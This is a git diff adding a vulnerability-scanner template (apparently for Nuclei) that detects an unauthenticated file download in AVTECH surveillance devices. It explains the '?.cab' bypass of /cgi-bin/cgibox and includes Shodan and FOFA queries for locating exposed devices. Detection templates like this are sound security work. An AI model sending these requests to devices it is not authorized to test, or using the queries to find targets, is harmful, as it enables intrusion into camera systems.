diff --git a/http/vulnerabilities/avtech/avtech-unauth-file-download.yaml b/http/vulnerabilities/avtech/avtech-unauth-file-download.yaml new file mode 100644 index 0000000000..ae4fb6dfcf --- /dev/null +++ b/http/vulnerabilities/avtech/avtech-unauth-file-download.yaml @@ -0,0 +1,39 @@ +id: avtech-unauth-file-download + +info: + name: AVTECH Video Surveillance Product - Unauthenticated File Download + author: ritikchaddha + severity: high + description: | + AVTECH video surveillance products unauthenticated file download from web root through /cgi-bin/cgibox, Since the .cab string is verified by the strstr method, the file download can be realized by adding ?.cab at the end of the file name. + metadata: + max-req: 2 + verified: "true" + shodan-query: title:"login" product:"Avtech" + fofa-query: app="AVTECH-视频监控" + tags: exposure,avtech,unauth,download,iot + +http: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/cgibox?.cab" + - "{{BaseURL}}/cgi-bin/cgibox?/nobody" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ELF' + - 'ddns_avtech_final' + condition: and + + - type: word + part: header + words: + - text/plain + + - type: status + status: + - 200